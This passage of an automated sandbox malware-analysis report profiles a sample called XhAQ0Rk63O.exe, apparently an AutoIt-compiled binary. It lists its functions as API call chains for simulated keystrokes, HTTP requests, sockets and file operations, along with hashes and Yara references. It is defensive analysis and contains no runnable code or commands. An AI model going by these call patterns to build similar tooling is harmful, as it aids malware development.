                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                          • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                          • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                          • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                          Function 00445CF9 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                            • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                            • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                          • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                          • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2014098862-0
                                                                                          • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                          • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                          • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                          • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                                          Function 0045427D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 259libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc_malloc$_strcat_strlen
                                                                                          • String ID: AU3_FreeVar
                                                                                          • API String ID: 2184576858-771828931
                                                                                          • Opcode ID: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                                          • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                          • Opcode Fuzzy Hash: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                                          • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                          Function 0044AA1F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                            • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                          • String ID:
                                                                                          • API String ID: 1291720006-3916222277
                                                                                          • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                          • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                          • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                          • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                          Function 0046BB59 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastselect
                                                                                          • String ID: HH
                                                                                          • API String ID: 215497628-2761332787
                                                                                          • Opcode ID: 81123ba87c51c271d749794d4387e1d0575ba96382d8685f9443cecf8545e782
                                                                                          • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                          • Opcode Fuzzy Hash: 81123ba87c51c271d749794d4387e1d0575ba96382d8685f9443cecf8545e782
                                                                                          • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                          Function 0047D2F8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                          • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                          • API String ID: 1729044348-3708979750
                                                                                          • Opcode ID: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                                          • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                                          • Opcode Fuzzy Hash: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                                          • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                                          Function 0044BBC9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\XhAQ0Rk63O.exe,?,C:\Users\user\Desktop\XhAQ0Rk63O.exe,004A8E80,C:\Users\user\Desktop\XhAQ0Rk63O.exe,0040F3D2), ref: 0040FFCA
                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                          • _wcscat.LIBCMT ref: 0044BCAA
                                                                                          • _wcslen.LIBCMT ref: 0044BCB7
                                                                                          • _wcslen.LIBCMT ref: 0044BCCB
                                                                                          • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 2326526234-1173974218
                                                                                          • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                          • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                                          • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                          • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                                          Function 004366BE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                                          • _wcslen.LIBCMT ref: 004366DD
                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                          • GetLastError.KERNEL32 ref: 0043670F
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                          • _wcsrchr.LIBCMT ref: 0043674C
                                                                                            • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                          • String ID: \
                                                                                          • API String ID: 321622961-2967466578
                                                                                          • Opcode ID: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                                          • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                          • Opcode Fuzzy Hash: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                                          • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                                          Function 0044C80C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsnicmp
                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                          • API String ID: 1038674560-2734436370
                                                                                          • Opcode ID: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                                          • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                                          • Opcode Fuzzy Hash: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                                          • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                                          Function 00441561 Relevance: 12.1, APIs: 8, Instructions: 101windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteObject.GDI32(?), ref: 0044157D
                                                                                          • GetDC.USER32(00000000), ref: 00441585
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3864802216-0
                                                                                          • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                          • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                                          • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                          • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                                          Function 004140DB Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                            • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                            • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                            • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                          • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                            • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                          • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                            • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                          • ExitThread.KERNEL32 ref: 0041410F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                          • __freefls@4.LIBCMT ref: 00414135
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                          • String ID:
                                                                                          • API String ID: 1925773019-0
                                                                                          • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                          • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                                          • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                          • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                                          Function 004357AD Relevance: 12.0, APIs: 8, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                          • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                          • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                          • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                          • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                          • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                          • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                          • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClearVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1473721057-0
                                                                                          • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                          • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                                          • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                          • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                                          Function 00464A0E Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                                            • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                          • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                                          • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                                          • _memset.LIBCMT ref: 00464B92
                                                                                          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                          • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                                          • String ID:
                                                                                          • API String ID: 3424476444-0
                                                                                          • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                          • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                          • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                          • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                          Function 00440B39 Relevance: 10.8, APIs: 7, Instructions: 261COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem
                                                                                          • String ID:
                                                                                          • API String ID: 4116985748-0
                                                                                          • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                          • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                          • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                          • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                          Function 0046AB70 Relevance: 10.8, APIs: 7, Instructions: 260registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
